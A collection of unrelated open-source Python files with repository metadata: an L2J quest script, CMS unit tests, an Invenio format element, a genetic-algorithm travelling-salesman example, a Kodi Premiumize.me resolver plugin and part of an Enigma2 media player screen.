# Created by DraX on 2005.08.12
# minor fixes by DrLecter 2005.09.10
print "importing village master data: Alliance ...done"
import sys
from net.sf.l2j.gameserver.model.quest import State
from net.sf.l2j.gameserver.model.quest import QuestState
from net.sf.l2j.gameserver.model.quest.jython import QuestJython as JQuest
NPC=[7026,7031,7037,7066,7070,7109,7115,7120,7154,7174,7175,7176,7187,7191,7195,7288,7289,7290,7297,7358,7373,7462,7474,7498,7499,7500,7503,7504,7505,7508,7511,7512,7513,7520,7525,7565,7594,7595,7676,7677,7681,7685,7687,7689,7694,7699,7704,7845,7847,7849,7854,7857,7862,7865,7894,7897,7900,7905,7910,7913,8269,8272,8276,8279,8285,8288,8314,8317,8321,8324,8326,8328,8331,8334,8755]
class Quest (JQuest) :
def onEvent (self,event,st):
ClanLeader = st.player.isClanLeader();
Clan = st.player.getClanId();
htmltext = event
if event == "9001-01.htm": htmltext = "9001-01.htm"
elif (Clan == 0):
st.exitQuest(1);
htmltext = "<html><body>You must be in Clan.</body></html";
elif event == "9001-02.htm": htmltext = "9001-02.htm"
return htmltext
def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)
def onTalk (self,npc,st):
npcId = npc.getNpcId()
ClanLeader = st.player.isClanLeader();
Clan = st.player.getClan();
if npcId in NPC:
st.set("cond","0")
st.setState(STARTED)
return "9001-01.htm"
QUEST = Quest(9001,"9001_alliance","village_master")
CREATED = State('Start', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
for item in NPC:
### Quest NPC starter initialization
QUEST.addStartNpc(item)
### Quest NPC initialization
STARTED.addTalkId(item)
|
Barrog/C4-Datapack
|
data/jscript/village_master/9001_alliance/__init__.py
|
Python
|
gpl-2.0
| 1,758
|
# -*- coding: utf-8 -*-
from castle.cms.browser.utils import Utils
from castle.cms import utils
from castle.cms.testing import CASTLE_PLONE_INTEGRATION_TESTING
from plone import api
from plone.app.testing import login
from plone.app.testing import setRoles
from plone.app.testing import TEST_USER_ID
from plone.app.testing import TEST_USER_NAME
from OFS.CopySupport import _cb_encode
from ZODB.POSException import ConflictError
import unittest
class TestUtils(unittest.TestCase):
layer = CASTLE_PLONE_INTEGRATION_TESTING
def setUp(self):
self.portal = self.layer['portal']
self.request = self.layer['request']
self.utils = Utils(self.portal, self.request)
def test_main_links(self):
login(self.portal, TEST_USER_NAME)
setRoles(self.portal, TEST_USER_ID, ('Member', 'Manager'))
if 'front-page' not in self.portal:
api.content.create(type='Document', id='front-page',
container=self.portal)
self.portal.setDefaultPage('front-page')
data = self.utils.get_main_links()
self.assertEquals(data['selected_portal_tab'], 'index_html')
self.assertEquals(len(data['portal_tabs']), 1)
def test_truncate_text(self):
self.assertEqual(
len(utils.truncate_text('foo bar foo bar', 2).split(' ')),
2)
def test_truncate_text_with_html(self):
result = utils.truncate_text('foo <b>bar</b> <span>foo bar</span>', 2)
self.assertEqual('foo <b>bar…</b>', result)
def test_random_functions(self):
self.assertEqual(len(utils.get_random_string(15)), 15)
self.assertEqual(len(utils.make_random_key(15)), 15)
def test_get_paste_data(self):
login(self.portal, TEST_USER_NAME)
setRoles(self.portal, TEST_USER_ID, ('Member', 'Manager'))
newpage = api.content.create(type='Document', id='newpage',
container=self.portal)
api.content.transition(obj=newpage, to_state='published')
cp = (0, [
('', 'plone', 'newpage')
])
cp = _cb_encode(cp)
self.request['__cp'] = cp
data = utils.get_paste_data(self.request)
self.assertEqual(data['count'], 1)
self.assertEqual(data['op'], 0)
self.assertEqual(data['paths'], ['/plone/newpage'])
def test_recursive_create_path(self):
login(self.portal, TEST_USER_NAME)
setRoles(self.portal, TEST_USER_ID, ('Member', 'Manager'))
folder = utils.recursive_create_path(self.portal, '/foo/bar/blah')
self.assertEqual(
'/'.join(folder.getPhysicalPath()),
'/plone/foo/bar/blah'
)
def test_retriable(self):
count = []
@utils.retriable(reraise=False)
def dosomething():
count.append(1)
raise ConflictError()
dosomething()
self.assertEqual(len(count), 3)
|
castlecms/castle.cms
|
castle/cms/tests/test_utils.py
|
Python
|
gpl-2.0
| 2,964
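test_retriable above pins down the observable contract of utils.retriable: on a ZODB ConflictError the wrapped function is re-run, three attempts happen in total, and reraise=False swallows the final failure. A minimal decorator with that behavior might look like the following sketch (the attempt count and signature are inferred from the test, not from the castle.cms implementation):

import functools

class ConflictError(Exception):
    """Stand-in for ZODB.POSException.ConflictError."""

def retriable(reraise=True, attempts=3):
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            for attempt in range(attempts):
                try:
                    return func(*args, **kwargs)
                except ConflictError:
                    if attempt == attempts - 1 and reraise:
                        raise
            return None  # all attempts failed and reraise=False
        return wrapper
    return decorator

calls = []

@retriable(reraise=False)
def flaky():
    calls.append(1)
    raise ConflictError()

flaky()
assert len(calls) == 3  # matches the count asserted in test_retriable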
|
# -*- coding: utf-8 -*-
##
## $Id: bfe_CERN_plots.py,v 1.3 2009/03/17 10:55:15 jerome Exp $
##
## This file is part of Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - Display image of the plot if we are in selected plots collection
"""
__revision__ = "$Id: bfe_CERN_plots.py,v 1.3 2009/03/17 10:55:15 jerome Exp $"
from invenio.bibdocfile import BibRecDocs
from invenio.urlutils import create_html_link
from invenio.config import CFG_SITE_URL
def format_element(bfo):
"""
Display the thumbnail image of the plot if we are in the selected plots collection
"""
## To achieve this, we take the Thumb file associated with this document
bibarchive = BibRecDocs(bfo.recID)
img_files = []
for doc in bibarchive.list_bibdocs():
for _file in doc.list_latest_files():
if _file.get_type() == "Plot":
caption_text = _file.get_description()[5:]
index = int(_file.get_description()[:5])
img_location = _file.get_url()
if img_location == "":
continue
img = '<img src="%s" width="100px"/>' % \
(img_location)
img_files.append((index, img_location)) # FIXME: was link here
if _file.get_type() == "Thumb":
img_location = _file.get_url()
img = '<img src="%s" width="100px"/>' % \
(img_location)
return '<div align="left">' + img + '</div>'
# then we use the default: the last plot with an image
img_files = sorted(img_files, key=lambda x: x[0])
if img_files:
return '<div align="left">' + img_files[-1][1] + '</div>'
else:
return ''
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
|
pombredanne/invenio
|
modules/bibformat/lib/elements/bfe_plots_thumb.py
|
Python
|
gpl-2.0
| 2,623
|
import math
import random
try:
import matplotlib.pyplot as plt
import matplotlib.animation as animation
plt.style.use('ggplot')
except ImportError:
plt = None
from ..algorithms import BaseGeneticAlgorithm
from ..chromosomes import ReorderingSetChromosome
from ..genes import BinaryGene
from ..translators import BinaryIntTranslator
class TravellingSalesmanGA(BaseGeneticAlgorithm):
def __init__(self, city_distances, *args, **kwargs):
"""
city_distances: 2-deep mapping of city_id -> city_id -> distance
"""
super().__init__(*args, **kwargs)
self.city_distances = city_distances
self.max_distance = max([max(subdict.values()) for subdict in city_distances.values()])
self.num_cities = len(self.city_distances)
def calc_distance(self, chromosome, pow=1):
# get list of city IDs
city_ids = self.translator.translate_chromosome(chromosome)
# compute distance travelled
tot_dist = 0
for i, start_city_id in enumerate(city_ids[:-1]):
end_city_id = city_ids[i + 1]
tot_dist += self.city_distances[start_city_id][end_city_id] ** pow
tot_dist += self.city_distances[city_ids[-1]][city_ids[0]] ** pow
return tot_dist
def eval_fitness(self, chromosome):
    """
    Evaluate a solution by converting the chromosome into a sequence
    of visited city IDs and negating the sum of squared leg distances
    (calc_distance with pow=2), so shorter tours score higher.

    Because solutions use a ReorderingSetChromosome, each city ID
    should appear exactly once, so no penalty terms are needed for
    repeated, missing, or invalid cities.

    return: fitness value
    """
    return -self.calc_distance(chromosome, pow=2)
def run(num_cities=20, num_chromosomes=20, generations=2500, plot=True):
# solve a simple travelling salesman problem
rs = random.randint(1, 1000000)
random.seed(100)
gene_length = -1
for i in range(1, num_cities + 1):
if 2 ** i >= num_cities:
gene_length = i + 1
break
assert gene_length >= 1
city_ids = list(range(1, num_cities + 1))
city_points = {city_id: (random.random() * 100, random.random() * 100) for city_id in city_ids}
city_distances = {}
for start_city_id in city_ids:
city_distances[start_city_id] = {}
x1, y1 = city_points[start_city_id]
for end_city_id in city_ids:
x2, y2 = city_points[end_city_id]
dist = math.sqrt((x2 - x1)**2 + (y2 - y1)**2)
city_distances[start_city_id][end_city_id] = dist
print("city distances:")
for start_city_id in city_ids:
for end_city_id in city_ids:
print("distance from", start_city_id, "to", end_city_id, "=", city_distances[start_city_id][end_city_id])
random.seed(rs)
chromosomes = []
for x in range(num_chromosomes):
genes = []
for city_id in city_ids:
dna = ('{:0' + str(gene_length) + 'd}').format(int(bin(city_id)[2:]))
g = BinaryGene(dna, name='city ' + str(city_id))
genes.append(g)
choices = [g.dna for g in genes]
c = ReorderingSetChromosome(genes, choices)
chromosomes.append(c)
ts_ga = TravellingSalesmanGA(city_distances, chromosomes,
translator=BinaryIntTranslator(),
abs_fit_weight=0, rel_fit_weight=1)
p_mutate = 0.10
p_cross = 0.50
best = ts_ga.run(generations, p_mutate, p_cross, elitist=True, refresh_after=generations/2)
best_city_ids = ts_ga.translator.translate_chromosome(best)
best_dist = ts_ga.calc_distance(best)
print("run took", ts_ga.run_time_s, "seconds")
print("best solution =", best_city_ids)
print("best distance =", best_dist)
if plot:
if plt:
# plot fitness progression
plt.plot([v for k, v in sorted(ts_ga.overall_fittest_fit.items())], label='run best')
plt.plot([v for k, v in sorted(ts_ga.generation_fittest_fit.items())], label='gen best')
plt.legend(loc='best')
plt.show()
fig, ax = plt.subplots()
def iter_generations():
for gen in ts_ga.new_fittest_generations:
yield gen
def animate(generation):
chromosome = ts_ga.generation_fittest[generation]
ax.clear()
x, y = [], []
for city_id, point in city_points.items():
x.append(point[0])
y.append(point[1])
ax.plot(x, y, marker='s', linestyle='', label='cities', alpha=0.6)
# plot optimal route
chrom_city_ids = ts_ga.translator.translate_chromosome(chromosome)
dist = round(ts_ga.calc_distance(chromosome), 2)
ax.set_title("generation " + str(generation) + "\ndistance = " + str(dist))
for i, start_city_id in enumerate(chrom_city_ids):
end_city_idx = i + 1
if end_city_idx == num_cities:
# distance from last city to first
end_city_idx = 0
end_city_id = chrom_city_ids[end_city_idx]
x1, y1 = city_points[start_city_id]
x2, y2 = city_points[end_city_id]
mid_x = (x2 - x1) / 2 + x1
mid_y = (y2 - y1) / 2 + y1
plt.arrow(x1, y1, x2 - x1, y2 - y1, head_width=1.5, fc='k', ec='k', alpha=0.7, linestyle='dotted', length_includes_head=True)
plt.text(mid_x, mid_y, str(i + 1))
ani = animation.FuncAnimation(fig, animate, iter_generations,
repeat=True, interval=1000, repeat_delay=12000)
plt.show()
else:
print("Did not plot example results because matplotlib not installed")
|
mdscruggs/ga
|
ga/examples/travelling_salesman.py
|
Python
|
gpl-2.0
| 6,091
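calc_distance above sums consecutive leg distances including the closing leg back to the starting city, and eval_fitness negates the pow=2 variant so shorter tours score higher. A hand-checkable standalone version for three cities, with illustrative coordinates:

import math

city_points = {1: (0.0, 0.0), 2: (3.0, 0.0), 3: (3.0, 4.0)}

def dist(a, b):
    (x1, y1), (x2, y2) = city_points[a], city_points[b]
    return math.hypot(x2 - x1, y2 - y1)

def tour_distance(city_ids, pow=1):
    total = 0.0
    for i, start in enumerate(city_ids[:-1]):
        total += dist(start, city_ids[i + 1]) ** pow
    total += dist(city_ids[-1], city_ids[0]) ** pow  # close the loop
    return total

tour = [1, 2, 3]
print(tour_distance(tour))          # legs 3 + 4 + 5 = 12.0
print(-tour_distance(tour, pow=2))  # fitness analogue: -(9 + 16 + 25) = -50.0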
|
"""
urlresolver XBMC Addon
Copyright (C) 2013 Bstrdsmkr
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import SiteAuth
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
from urlresolver import common
from t0mm0.common.net import Net
import re
import urllib
try:
import simplejson as json
except ImportError:
import json
class PremiumizeMeResolver(Plugin, UrlResolver, SiteAuth, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "Premiumize.me"
domains = ["*"]
media_url = None
def __init__(self):
p = self.get_setting('priority') or 100
self.hosts = []
self.patterns = []
self.priority = int(p)
self.net = Net()
self.scheme = 'https' if self.get_setting('use_https') == 'true' else 'http'
def get_media_url(self, host, media_id):
username = self.get_setting('username')
password = self.get_setting('password')
url = '%s://api.premiumize.me/pm-api/v1.php?' % (self.scheme)
query = urllib.urlencode({'method': 'directdownloadlink', 'params[login]': username, 'params[pass]': password, 'params[link]': media_id})
url = url + query
response = self.net.http_GET(url).content
response = json.loads(response)
if 'status' in response:
if response['status'] == 200:
link = response['result']['location']
else:
raise UrlResolver.ResolverError('Link Not Found: Error Code: %s' % response['status'])
else:
raise UrlResolver.ResolverError('Unexpected Response Received')
common.addon.log_debug('Premiumize.me: Resolved to %s' % link)
return link
def get_url(self, host, media_id):
return media_id
def get_host_and_id(self, url):
return 'premiumize.me', url
def get_all_hosters(self):
try:
if not self.patterns or not self.hosts:
username = self.get_setting('username')
password = self.get_setting('password')
url = '%s://api.premiumize.me/pm-api/v1.php?' % (self.scheme)
query = urllib.urlencode({'method': 'hosterlist', 'params[login]': username, 'params[pass]': password})
url = url + query
response = self.net.http_GET(url).content
response = json.loads(response)
result = response['result']
log_msg = 'Premiumize.me patterns: %s hosts: %s' % (result['regexlist'], result['tldlist'])
common.addon.log_debug(log_msg)
self.hosts = result['tldlist']
self.patterns = [re.compile(regex) for regex in result['regexlist']]
except Exception as e:
common.addon.log_error('Error getting Premiumize hosts: %s' % (e))
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
if self.get_setting('login') == 'false': return False
self.get_all_hosters()
if url:
if not url.endswith('/'): url += '/'
for pattern in self.patterns:
if pattern.findall(url):
return True
elif host:
if host.startswith('www.'): host = host.replace('www.', '')
if any(host in item for item in self.hosts):
return True
return False
def get_settings_xml(self):
xml = PluginSettings.get_settings_xml(self)
xml += '<setting id="%s_use_https" type="bool" label="Use HTTPS" default="false"/>\n' % (self.__class__.__name__)
xml += '<setting id="%s_login" type="bool" label="login" default="false"/>\n' % (self.__class__.__name__)
xml += '<setting id="%s_username" enable="eq(-1,true)" type="text" label="Customer ID" default=""/>\n' % (self.__class__.__name__)
xml += '<setting id="%s_password" enable="eq(-2,true)" type="text" label="PIN" option="hidden" default=""/>\n' % (self.__class__.__name__)
return xml
def isUniversal(self):
return True
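# Usage sketch (hedged): assumes the urlresolver framework has loaded this
# plugin and that valid Premiumize.me credentials are stored in its settings;
# the host and link below are placeholders, not real endpoints.
#
#     resolver = PremiumizeMeResolver()
#     link = 'http://somehost.example/abc123'
#     if resolver.valid_url(link, 'somehost.example'):
#         stream_url = resolver.get_media_url('somehost.example', link)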
|
noba3/KoTos
|
addons/script.module.urlresolver/lib/urlresolver/plugins/premiumize_me.py
|
Python
|
gpl-2.0
| 4,829
|
import os
import time
from enigma import iPlayableService, eTimer, eServiceCenter, iServiceInformation, ePicLoad
from ServiceReference import ServiceReference
from Screens.Screen import Screen
from Screens.HelpMenu import HelpableScreen
from Screens.MessageBox import MessageBox
from Screens.InputBox import InputBox
from Screens.ChoiceBox import ChoiceBox
from Screens.InfoBar import InfoBar
from Screens.InfoBarGenerics import InfoBarSeek, InfoBarScreenSaver, InfoBarAudioSelection, InfoBarCueSheetSupport, InfoBarNotifications, InfoBarSubtitleSupport
from Components.ActionMap import NumberActionMap, HelpableActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap, MultiPixmap
from Components.FileList import FileList
from Components.MediaPlayer import PlayList
from Components.MovieList import AUDIO_EXTENSIONS
from Components.ServicePosition import ServicePositionGauge
from Components.ServiceEventTracker import ServiceEventTracker, InfoBarBase
from Components.Playlist import PlaylistIOInternal, PlaylistIOM3U, PlaylistIOPLS
from Components.AVSwitch import AVSwitch
from Components.config import config
from Components.SystemInfo import SystemInfo
from Tools.Directories import fileExists, resolveFilename, SCOPE_CONFIG, SCOPE_PLAYLIST, SCOPE_CURRENT_SKIN
from Tools.BoundFunction import boundFunction
from settings import MediaPlayerSettings
import random
class MyPlayList(PlayList):
def __init__(self):
PlayList.__init__(self)
def PlayListShuffle(self):
random.shuffle(self.list)
self.l.setList(self.list)
self.currPlaying = -1
self.oldCurrPlaying = -1
class MediaPixmap(Pixmap):
def __init__(self):
Pixmap.__init__(self)
self.coverArtFileName = ""
self.picload = ePicLoad()
self.picload.PictureData.get().append(self.paintCoverArtPixmapCB)
self.coverFileNames = ["folder.png", "folder.jpg"]
def applySkin(self, desktop, screen):
from Tools.LoadPixmap import LoadPixmap
noCoverFile = None
if self.skinAttributes is not None:
for (attrib, value) in self.skinAttributes:
if attrib == "pixmap":
noCoverFile = value
break
if noCoverFile is None:
noCoverFile = resolveFilename(SCOPE_CURRENT_SKIN, "no_coverArt.png")
self.noCoverPixmap = LoadPixmap(noCoverFile)
return Pixmap.applySkin(self, desktop, screen)
def onShow(self):
Pixmap.onShow(self)
sc = AVSwitch().getFramebufferScale()
		# setPara args: (width, height, aspect_num, aspect_denom, use_cache, resize_type, background "#AARRGGBB")
self.picload.setPara((self.instance.size().width(), self.instance.size().height(), sc[0], sc[1], False, 1, "#00000000"))
def paintCoverArtPixmapCB(self, picInfo=None):
ptr = self.picload.getData()
if ptr is not None:
self.instance.setPixmap(ptr.__deref__())
def updateCoverArt(self, path):
while not path.endswith("/"):
path = path[:-1]
new_coverArtFileName = None
for filename in self.coverFileNames:
if fileExists(path + filename):
new_coverArtFileName = path + filename
if self.coverArtFileName != new_coverArtFileName:
self.coverArtFileName = new_coverArtFileName
if new_coverArtFileName:
self.picload.startDecode(self.coverArtFileName)
else:
self.showDefaultCover()
def showDefaultCover(self):
self.instance.setPixmap(self.noCoverPixmap)
def embeddedCoverArt(self):
print "[embeddedCoverArt] found"
self.coverArtFileName = "/tmp/.id3coverart"
self.picload.startDecode(self.coverArtFileName)
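# Cover-art lookup, sketched: updateCoverArt() trims the playing file's path
# back to its directory and picks the first match from coverFileNames, e.g.
# (illustrative layout only):
#
#     /media/music/album/track01.mp3
#     /media/music/album/folder.jpg   <-- used as cover art
#
# Embedded ID3 art arrives separately via /tmp/.id3coverart (embeddedCoverArt
# above); if neither source exists, the skin's no_coverArt.png is shown.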
class MediaPlayerInfoBar(Screen):
def __init__(self, session):
Screen.__init__(self, session)
self.skinName = "MoviePlayer"
class MediaPlayer(Screen, InfoBarBase, InfoBarScreenSaver, InfoBarSeek, InfoBarAudioSelection, InfoBarCueSheetSupport, InfoBarNotifications, InfoBarSubtitleSupport, HelpableScreen):
ALLOW_SUSPEND = True
ENABLE_RESUME_SUPPORT = True
FLAG_CENTER_DVB_SUBS = 2048
def __init__(self, session, args = None):
Screen.__init__(self, session)
InfoBarAudioSelection.__init__(self)
InfoBarCueSheetSupport.__init__(self, actionmap = "MediaPlayerCueSheetActions")
InfoBarNotifications.__init__(self)
InfoBarBase.__init__(self)
InfoBarScreenSaver.__init__(self)
InfoBarSubtitleSupport.__init__(self)
HelpableScreen.__init__(self)
self.summary = None
self.oldService = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.session.nav.stopService()
self.setTitle(_("Media player"))
self.playlistparsers = {}
self.addPlaylistParser(PlaylistIOM3U, "m3u")
self.addPlaylistParser(PlaylistIOPLS, "pls")
self.addPlaylistParser(PlaylistIOInternal, "e2pls")
# 'None' is magic to start at the list of mountpoints
defaultDir = config.mediaplayer.defaultDir.getValue()
self.filelist = FileList(defaultDir, matchingPattern = "(?i)^.*\.(dts|mp3|wav|wave|wv|oga|ogg|flac|m4a|mp2|m2a|wma|ac3|mka|aac|ape|alac|mpg|vob|m4v|mkv|avi|divx|dat|flv|mp4|mov|wmv|asf|3gp|3g2|mpeg|mpe|rm|rmvb|ogm|ogv|m2ts|mts|ts|m3u|e2pls|pls|amr|au|mid|pva|wtv)", useServiceRef = True, additionalExtensions = "4098:m3u 4098:e2pls 4098:pls")
self["filelist"] = self.filelist
self.playlist = MyPlayList()
self.is_closing = False
self.delname = ""
self.playlistname = ""
self["playlist"] = self.playlist
self["PositionGauge"] = ServicePositionGauge(self.session.nav)
self["currenttext"] = Label("")
self["artisttext"] = Label(_("Artist")+':')
self["artist"] = Label("")
self["titletext"] = Label(_("Title")+':')
self["title"] = Label("")
self["albumtext"] = Label(_("Album")+':')
self["album"] = Label("")
self["yeartext"] = Label(_("Year")+':')
self["year"] = Label("")
self["genretext"] = Label(_("Genre")+':')
self["genre"] = Label("")
self["coverArt"] = MediaPixmap()
self["repeat"] = MultiPixmap()
self.seek_target = None
try:
from Plugins.SystemPlugins.Hotplug.plugin import hotplugNotifier
hotplugNotifier.append(self.hotplugCB)
except Exception, ex:
print "[MediaPlayer] No hotplug support", ex
class MoviePlayerActionMap(NumberActionMap):
def __init__(self, player, contexts = [ ], actions = { }, prio=0):
NumberActionMap.__init__(self, contexts, actions, prio)
self.player = player
def action(self, contexts, action):
self.player.show()
return NumberActionMap.action(self, contexts, action)
self["OkCancelActions"] = HelpableActionMap(self, "OkCancelActions",
{
"ok": (self.ok, _("Add file to playlist")),
"cancel": (self.exit, _("Exit mediaplayer")),
}, -2)
self["MediaPlayerActions"] = HelpableActionMap(self, "MediaPlayerActions",
{
"play": (self.xplayEntry, _("Play entry")),
"pause": (self.pauseEntry, _("Pause")),
"stop": (self.stopEntry, _("Stop entry")),
"previous": (self.previousMarkOrEntry, _("Play from previous mark or playlist entry")),
"next": (self.nextMarkOrEntry, _("Play from next mark or playlist entry")),
"menu": (self.showMenu, _("Menu")),
"skipListbegin": (self.skip_listbegin, _("Jump to beginning of list")),
"skipListend": (self.skip_listend, _("Jump to end of list")),
"prevBouquet": (self.prevBouquet, self.prevBouquetHelpText),
"nextBouquet": (self.nextBouquet, self.nextBouquetHelptext),
"delete": (self.deletePlaylistEntry, _("Delete playlist entry")),
"shift_stop": (self.clear_playlist, _("Clear playlist")),
"shift_record": (self.playlist.PlayListShuffle, _("Shuffle playlist")),
"subtitles": (self.subtitleSelection, _("Subtitle selection")),
}, -2)
self["InfobarEPGActions"] = HelpableActionMap(self, "InfobarEPGActions",
{
"showEventInfo": (self.showEventInformation, _("show event details")),
})
self["actions"] = MoviePlayerActionMap(self, ["DirectionActions"],
{
"right": self.rightDown,
"rightRepeated": self.doNothing,
"rightUp": self.rightUp,
"left": self.leftDown,
"leftRepeated": self.doNothing,
"leftUp": self.leftUp,
"up": self.up,
"upRepeated": self.up,
"upUp": self.doNothing,
"down": self.down,
"downRepeated": self.down,
"downUp": self.doNothing,
}, -2)
InfoBarSeek.__init__(self, actionmap = "MediaPlayerSeekActions")
self.mediaPlayerInfoBar = self.session.instantiateDialog(MediaPlayerInfoBar)
self.onClose.append(self.delMPTimer)
self.onClose.append(self.__onClose)
self.onShow.append(self.timerHideMediaPlayerInfoBar)
self.righttimer = False
self.rightKeyTimer = eTimer()
self.rightKeyTimer.callback.append(self.rightTimerFire)
self.lefttimer = False
self.leftKeyTimer = eTimer()
self.leftKeyTimer.callback.append(self.leftTimerFire)
self.hideMediaPlayerInfoBar = eTimer()
self.hideMediaPlayerInfoBar.callback.append(self.timerHideMediaPlayerInfoBar)
self.currList = "filelist"
self.isAudioCD = False
self.ext = None
self.AudioCD_albuminfo = {}
self.cdAudioTrackFiles = []
self.onShown.append(self.applySettings)
self.playlistIOInternal = PlaylistIOInternal()
list = self.playlistIOInternal.open(resolveFilename(SCOPE_CONFIG, "playlist.e2pls"))
if list:
for x in list:
self.playlist.addFile(x.ref)
self.playlist.updateList()
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evUpdatedInfo: self.__evUpdatedInfo,
iPlayableService.evUser+10: self.__evAudioDecodeError,
iPlayableService.evUser+11: self.__evVideoDecodeError,
iPlayableService.evUser+12: self.__evPluginError,
iPlayableService.evUser+13: self["coverArt"].embeddedCoverArt
})
self.servicelist = None
self.pipZapAvailable = False
if InfoBar.instance is not None:
self.servicelist = InfoBar.instance.servicelist
if self.servicelist and hasattr(self.servicelist, 'dopipzap'):
self.pipZapAvailable = SystemInfo.get("NumVideoDecoders", 1) > 1
def prevBouquetHelpText(self):
if not self.shown and self.isPiPzap():
value = _("when PiPzap enabled zap channel up...")
else:
value = _("Switch between filelist/playlist")
return value
def nextBouquetHelptext(self):
if not self.shown and self.isPiPzap():
value = _("when PiPzap enabled zap channel down...")
else:
value = _("Switch between filelist/playlist")
return value
def hideAndInfoBar(self):
self.hide()
self.mediaPlayerInfoBar.show()
if config.mediaplayer.alwaysHideInfoBar.value or self.ext not in AUDIO_EXTENSIONS and not self.isAudioCD:
self.hideMediaPlayerInfoBar.start(5000, True)
def timerHideMediaPlayerInfoBar(self):
self.hideMediaPlayerInfoBar.stop()
self.mediaPlayerInfoBar.hide()
def doNothing(self):
pass
def createSummary(self):
return MediaPlayerLCDScreen
def exit(self):
if self.mediaPlayerInfoBar.shown:
self.timerHideMediaPlayerInfoBar()
else:
self.session.openWithCallback(self.exitCallback, MessageBox, _("Exit media player?"), simple = not self.shown)
def exitCallback(self, answer):
if answer:
self.playlistIOInternal.clear()
for x in self.playlist.list:
self.playlistIOInternal.addService(ServiceReference(x[0]))
if self.savePlaylistOnExit:
try:
self.playlistIOInternal.save(resolveFilename(SCOPE_CONFIG, "playlist.e2pls"))
except IOError:
print "couldn't save playlist.e2pls"
if config.mediaplayer.saveDirOnExit.getValue():
config.mediaplayer.defaultDir.setValue(self.filelist.getCurrentDirectory())
config.mediaplayer.defaultDir.save()
try:
from Plugins.SystemPlugins.Hotplug.plugin import hotplugNotifier
hotplugNotifier.remove(self.hotplugCB)
except:
pass
del self["coverArt"].picload
self.close()
def checkSkipShowHideLock(self):
self.updatedSeekState()
def doEofInternal(self, playing):
if playing:
self.nextEntry()
else:
self.show()
def __onClose(self):
self.mediaPlayerInfoBar.doClose()
self.session.nav.playService(self.oldService)
def __evUpdatedInfo(self):
currPlay = self.session.nav.getCurrentService()
sTagTrackNumber = currPlay.info().getInfo(iServiceInformation.sTagTrackNumber)
sTagTrackCount = currPlay.info().getInfo(iServiceInformation.sTagTrackCount)
sTagTitle = currPlay.info().getInfoString(iServiceInformation.sTagTitle)
if sTagTrackNumber or sTagTrackCount or sTagTitle:
print "[__evUpdatedInfo] title %d of %d (%s)" % (sTagTrackNumber, sTagTrackCount, sTagTitle)
self.readTitleInformation()
def __evAudioDecodeError(self):
currPlay = self.session.nav.getCurrentService()
sTagAudioCodec = currPlay.info().getInfoString(iServiceInformation.sTagAudioCodec)
print "[__evAudioDecodeError] audio-codec %s can't be decoded by hardware" % (sTagAudioCodec)
self.session.open(MessageBox, _("This receiver cannot decode %s streams!") % sTagAudioCodec, type = MessageBox.TYPE_INFO,timeout = 20 )
def __evVideoDecodeError(self):
currPlay = self.session.nav.getCurrentService()
sTagVideoCodec = currPlay.info().getInfoString(iServiceInformation.sTagVideoCodec)
print "[__evVideoDecodeError] video-codec %s can't be decoded by hardware" % (sTagVideoCodec)
self.session.open(MessageBox, _("This receiver cannot decode %s streams!") % sTagVideoCodec, type = MessageBox.TYPE_INFO,timeout = 20 )
def __evPluginError(self):
currPlay = self.session.nav.getCurrentService()
message = currPlay.info().getInfoString(iServiceInformation.sUser+12)
print "[__evPluginError]" , message
self.session.open(MessageBox, message, type = MessageBox.TYPE_INFO,timeout = 20 )
def delMPTimer(self):
del self.rightKeyTimer
del self.leftKeyTimer
def readTitleInformation(self):
currPlay = self.session.nav.getCurrentService()
if currPlay is not None:
sTitle = currPlay.info().getInfoString(iServiceInformation.sTagTitle)
sAlbum = currPlay.info().getInfoString(iServiceInformation.sTagAlbum)
sGenre = currPlay.info().getInfoString(iServiceInformation.sTagGenre)
sArtist = currPlay.info().getInfoString(iServiceInformation.sTagArtist)
sYear = currPlay.info().getInfoString(iServiceInformation.sTagDate)
if sTitle == "":
if not self.isAudioCD:
sTitle = currPlay.info().getName().split('/')[-1]
else:
sTitle = self.playlist.getServiceRefList()[self.playlist.getCurrentIndex()].getName()
if self.AudioCD_albuminfo:
if sAlbum == "" and "title" in self.AudioCD_albuminfo:
sAlbum = self.AudioCD_albuminfo["title"]
if sGenre == "" and "genre" in self.AudioCD_albuminfo:
sGenre = self.AudioCD_albuminfo["genre"]
if sArtist == "" and "artist" in self.AudioCD_albuminfo:
sArtist = self.AudioCD_albuminfo["artist"]
if "year" in self.AudioCD_albuminfo:
sYear = self.AudioCD_albuminfo["year"]
self.updateMusicInformation( sArtist, sTitle, sAlbum, sYear, sGenre, clear = True )
else:
self.updateMusicInformation()
def updateMusicInformation(self, artist = "", title = "", album = "", year = "", genre = "", clear = False):
self.updateSingleMusicInformation("artist", artist, clear)
self.updateSingleMusicInformation("title", title, clear)
self.updateSingleMusicInformation("album", album, clear)
